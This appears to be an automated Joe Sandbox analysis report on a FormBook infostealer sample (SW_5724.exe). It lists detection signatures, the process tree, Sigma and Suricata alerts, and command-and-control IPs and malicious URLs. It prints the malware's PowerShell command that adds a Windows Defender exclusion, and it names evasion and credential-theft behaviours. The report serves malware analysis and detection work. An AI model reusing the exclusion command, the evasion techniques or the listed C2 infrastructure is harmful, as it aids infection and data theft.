Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SW_5724.exe

Overview

General Information

Sample name:SW_5724.exe
Analysis ID:1567396
MD5:cf8c34b20f0e8654371c004272b4def6
SHA1:1c81b7ac021345bd328e7cabee98979a1923d5b3
SHA256:61890e63d7ba75eeccb7bf59ab004ab2aa94e463137a8fbb162d40921a8aa59f
Tags:exeuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • SW_5724.exe (PID: 7284 cmdline: "C:\Users\user\Desktop\SW_5724.exe" MD5: CF8C34B20F0E8654371C004272B4DEF6)
    • powershell.exe (PID: 7464 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_5724.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7656 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • SW_5724.exe (PID: 7480 cmdline: "C:\Users\user\Desktop\SW_5724.exe" MD5: CF8C34B20F0E8654371C004272B4DEF6)
    • SW_5724.exe (PID: 7496 cmdline: "C:\Users\user\Desktop\SW_5724.exe" MD5: CF8C34B20F0E8654371C004272B4DEF6)
      • BmUrsTIvMw.exe (PID: 5068 cmdline: "C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • regini.exe (PID: 8024 cmdline: "C:\Windows\SysWOW64\regini.exe" MD5: C99C3BB423097FCF4990539FC1ED60E3)
          • BmUrsTIvMw.exe (PID: 1536 cmdline: "C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7084 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.4517476095.0000000005080000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000A.00000002.4514626352.0000000000700000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000006.00000002.2335532863.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000A.00000002.4515595244.0000000002AB0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            6.2.SW_5724.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              6.2.SW_5724.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_5724.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_5724.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SW_5724.exe", ParentImage: C:\Users\user\Desktop\SW_5724.exe, ParentProcessId: 7284, ParentProcessName: SW_5724.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_5724.exe", ProcessId: 7464, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_5724.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_5724.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SW_5724.exe", ParentImage: C:\Users\user\Desktop\SW_5724.exe, ParentProcessId: 7284, ParentProcessName: SW_5724.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_5724.exe", ProcessId: 7464, ProcessName: powershell.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_5724.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_5724.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SW_5724.exe", ParentImage: C:\Users\user\Desktop\SW_5724.exe, ParentProcessId: 7284, ParentProcessName: SW_5724.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SW_5724.exe", ProcessId: 7464, ProcessName: powershell.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-03T14:21:34.946868+010020507451Malware Command and Control Activity Detected192.168.2.54979613.248.169.4880TCP
                2024-12-03T14:21:59.786006+010020507451Malware Command and Control Activity Detected192.168.2.54985513.248.169.4880TCP
                2024-12-03T14:22:14.455178+010020507451Malware Command and Control Activity Detected192.168.2.54989084.32.84.3280TCP
                2024-12-03T14:22:29.471163+010020507451Malware Command and Control Activity Detected192.168.2.54992784.32.84.3280TCP
                2024-12-03T14:22:44.685627+010020507451Malware Command and Control Activity Detected192.168.2.549961209.74.77.10780TCP
                2024-12-03T14:23:00.043567+010020507451Malware Command and Control Activity Detected192.168.2.54999838.47.207.16480TCP
                2024-12-03T14:23:15.314569+010020507451Malware Command and Control Activity Detected192.168.2.550007208.115.225.22080TCP
                2024-12-03T14:23:40.129216+010020507451Malware Command and Control Activity Detected192.168.2.550011104.21.15.10080TCP
                2024-12-03T14:23:55.178752+010020507451Malware Command and Control Activity Detected192.168.2.550015199.59.243.22780TCP
                2024-12-03T14:24:10.187099+010020507451Malware Command and Control Activity Detected192.168.2.550019199.59.243.22780TCP
                2024-12-03T14:24:25.018599+010020507451Malware Command and Control Activity Detected192.168.2.550023172.67.156.19580TCP
                2024-12-03T14:24:40.321300+010020507451Malware Command and Control Activity Detected192.168.2.550027108.179.253.19780TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-03T14:21:34.946868+010028554651A Network Trojan was detected192.168.2.54979613.248.169.4880TCP
                2024-12-03T14:21:59.786006+010028554651A Network Trojan was detected192.168.2.54985513.248.169.4880TCP
                2024-12-03T14:22:14.455178+010028554651A Network Trojan was detected192.168.2.54989084.32.84.3280TCP
                2024-12-03T14:22:29.471163+010028554651A Network Trojan was detected192.168.2.54992784.32.84.3280TCP
                2024-12-03T14:22:44.685627+010028554651A Network Trojan was detected192.168.2.549961209.74.77.10780TCP
                2024-12-03T14:23:00.043567+010028554651A Network Trojan was detected192.168.2.54999838.47.207.16480TCP
                2024-12-03T14:23:15.314569+010028554651A Network Trojan was detected192.168.2.550007208.115.225.22080TCP
                2024-12-03T14:23:40.129216+010028554651A Network Trojan was detected192.168.2.550011104.21.15.10080TCP
                2024-12-03T14:23:55.178752+010028554651A Network Trojan was detected192.168.2.550015199.59.243.22780TCP
                2024-12-03T14:24:10.187099+010028554651A Network Trojan was detected192.168.2.550019199.59.243.22780TCP
                2024-12-03T14:24:25.018599+010028554651A Network Trojan was detected192.168.2.550023172.67.156.19580TCP
                2024-12-03T14:24:40.321300+010028554651A Network Trojan was detected192.168.2.550027108.179.253.19780TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-03T14:21:51.778129+010028554641A Network Trojan was detected192.168.2.54983313.248.169.4880TCP
                2024-12-03T14:21:54.486783+010028554641A Network Trojan was detected192.168.2.54983913.248.169.4880TCP
                2024-12-03T14:21:57.111215+010028554641A Network Trojan was detected192.168.2.54984913.248.169.4880TCP
                2024-12-03T14:22:06.414414+010028554641A Network Trojan was detected192.168.2.54987184.32.84.3280TCP
                2024-12-03T14:22:09.083403+010028554641A Network Trojan was detected192.168.2.54987784.32.84.3280TCP
                2024-12-03T14:22:11.750739+010028554641A Network Trojan was detected192.168.2.54988384.32.84.3280TCP
                2024-12-03T14:22:21.420221+010028554641A Network Trojan was detected192.168.2.54990584.32.84.3280TCP
                2024-12-03T14:22:24.251577+010028554641A Network Trojan was detected192.168.2.54991384.32.84.3280TCP
                2024-12-03T14:22:26.834222+010028554641A Network Trojan was detected192.168.2.54991984.32.84.3280TCP
                2024-12-03T14:22:36.727816+010028554641A Network Trojan was detected192.168.2.549943209.74.77.10780TCP
                2024-12-03T14:22:39.404800+010028554641A Network Trojan was detected192.168.2.549949209.74.77.10780TCP
                2024-12-03T14:22:42.087413+010028554641A Network Trojan was detected192.168.2.549955209.74.77.10780TCP
                2024-12-03T14:22:51.858807+010028554641A Network Trojan was detected192.168.2.54997838.47.207.16480TCP
                2024-12-03T14:22:54.605716+010028554641A Network Trojan was detected192.168.2.54998538.47.207.16480TCP
                2024-12-03T14:22:57.262492+010028554641A Network Trojan was detected192.168.2.54999238.47.207.16480TCP
                2024-12-03T14:23:07.323412+010028554641A Network Trojan was detected192.168.2.550004208.115.225.22080TCP
                2024-12-03T14:23:09.944094+010028554641A Network Trojan was detected192.168.2.550005208.115.225.22080TCP
                2024-12-03T14:23:12.661850+010028554641A Network Trojan was detected192.168.2.550006208.115.225.22080TCP
                2024-12-03T14:23:30.937979+010028554641A Network Trojan was detected192.168.2.550008104.21.15.10080TCP
                2024-12-03T14:23:33.606470+010028554641A Network Trojan was detected192.168.2.550009104.21.15.10080TCP
                2024-12-03T14:23:36.278247+010028554641A Network Trojan was detected192.168.2.550010104.21.15.10080TCP
                2024-12-03T14:23:46.977862+010028554641A Network Trojan was detected192.168.2.550012199.59.243.22780TCP
                2024-12-03T14:23:49.565770+010028554641A Network Trojan was detected192.168.2.550013199.59.243.22780TCP
                2024-12-03T14:23:52.235340+010028554641A Network Trojan was detected192.168.2.550014199.59.243.22780TCP
                2024-12-03T14:24:02.157586+010028554641A Network Trojan was detected192.168.2.550016199.59.243.22780TCP
                2024-12-03T14:24:04.932428+010028554641A Network Trojan was detected192.168.2.550017199.59.243.22780TCP
                2024-12-03T14:24:07.523747+010028554641A Network Trojan was detected192.168.2.550018199.59.243.22780TCP
                2024-12-03T14:24:16.929560+010028554641A Network Trojan was detected192.168.2.550020172.67.156.19580TCP
                2024-12-03T14:24:19.664810+010028554641A Network Trojan was detected192.168.2.550021172.67.156.19580TCP
                2024-12-03T14:24:22.314364+010028554641A Network Trojan was detected192.168.2.550022172.67.156.19580TCP
                2024-12-03T14:24:32.351290+010028554641A Network Trojan was detected192.168.2.550024108.179.253.19780TCP
                2024-12-03T14:24:35.024724+010028554641A Network Trojan was detected192.168.2.550025108.179.253.19780TCP
                2024-12-03T14:24:37.768398+010028554641A Network Trojan was detected192.168.2.550026108.179.253.19780TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-03T14:21:57.111215+010028563181A Network Trojan was detected192.168.2.54984913.248.169.4880TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.appsolucao.shop/8mlm/Avira URL Cloud: Label: malware
                Source: http://www.appsolucao.shop/8mlm/?jnGlY=dHeXwH1PkJZDr&fh=Dou+d174n903Q5s8eGVlbncTBC0Rpufru8Nex+2NzpzCLkW84PIBEnPU/VIOuudaHO13J+F+WsJAELWMIa4GeHkI0VbuKcGIGxf8Na/XWMFk3HWS90xtCxfW9k4DFGjEgQ==Avira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: SW_5724.exeReversingLabs: Detection: 42%
                Yara detected FormBook
                Source: Yara matchFile source: 6.2.SW_5724.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.SW_5724.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.4517476095.0000000005080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.4514408962.0000000000460000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.4514626352.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2335532863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.4515595244.0000000002AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2430161361.0000000007360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4515540359.0000000003660000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2341900856.00000000027B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: SW_5724.exeJoe Sandbox ML: detected
                Source: SW_5724.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: SW_5724.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BmUrsTIvMw.exe, 00000009.00000002.4514409614.000000000019E000.00000002.00000001.01000000.0000000C.sdmp, BmUrsTIvMw.exe, 0000000B.00000002.4514410674.000000000019E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: SW_5724.exe, 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 0000000A.00000003.2350461872.0000000002B95000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000A.00000003.2347907169.00000000029E2000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SW_5724.exe, SW_5724.exe, 00000006.00000002.2336234768.0000000001A20000.00000040.00001000.00020000.00000000.sdmp, regini.exe, regini.exe, 0000000A.00000003.2350461872.0000000002B95000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000A.00000003.2347907169.00000000029E2000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 0000000A.00000002.4515776894.0000000002D40000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 0000000A.00000002.4515776894.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: regini.pdbGCTL source: SW_5724.exe, 00000006.00000002.2335700120.0000000001407000.00000004.00000020.00020000.00000000.sdmp, BmUrsTIvMw.exe, 00000009.00000003.2595517086.0000000000F2B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: regini.pdb source: SW_5724.exe, 00000006.00000002.2335700120.0000000001407000.00000004.00000020.00020000.00000000.sdmp, BmUrsTIvMw.exe, 00000009.00000003.2595517086.0000000000F2B000.00000004.00000001.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\regini.exeCode function: 10_2_0047C7B0 FindFirstFileW,FindNextFileW,FindClose,10_2_0047C7B0
                Source: C:\Windows\SysWOW64\regini.exeCode function: 4x nop then xor eax, eax10_2_00469F10
                Source: C:\Windows\SysWOW64\regini.exeCode function: 4x nop then pop edi10_2_0046E37A
                Source: C:\Windows\SysWOW64\regini.exeCode function: 4x nop then mov ebx, 00000004h10_2_02BA0525

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49796 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49796 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49849 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.5:49849 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49855 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49833 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49855 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49883 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49877 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49839 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49890 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49890 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49905 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49913 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49871 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49919 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49927 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49927 -> 84.32.84.32:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49943 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49949 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49955 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49978 -> 38.47.207.164:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49985 -> 38.47.207.164:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49998 -> 38.47.207.164:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49998 -> 38.47.207.164:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 208.115.225.220:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 104.21.15.100:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49961 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49961 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50006 -> 208.115.225.220:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50007 -> 208.115.225.220:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50011 -> 104.21.15.100:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50007 -> 208.115.225.220:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49992 -> 38.47.207.164:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50011 -> 104.21.15.100:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50021 -> 172.67.156.195:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50017 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50020 -> 172.67.156.195:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50016 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50027 -> 108.179.253.197:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50015 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50015 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50026 -> 108.179.253.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50014 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50027 -> 108.179.253.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50024 -> 108.179.253.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50025 -> 108.179.253.197:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50012 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50022 -> 172.67.156.195:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50019 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50019 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50004 -> 208.115.225.220:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50018 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50008 -> 104.21.15.100:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50010 -> 104.21.15.100:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50013 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:50023 -> 172.67.156.195:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50023 -> 172.67.156.195:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.egldfi.xyz
                Source: DNS query: www.egyshare.xyz
                Source: DNS query: www.dating-apps-az-dn5.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 209.74.77.107 209.74.77.107
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
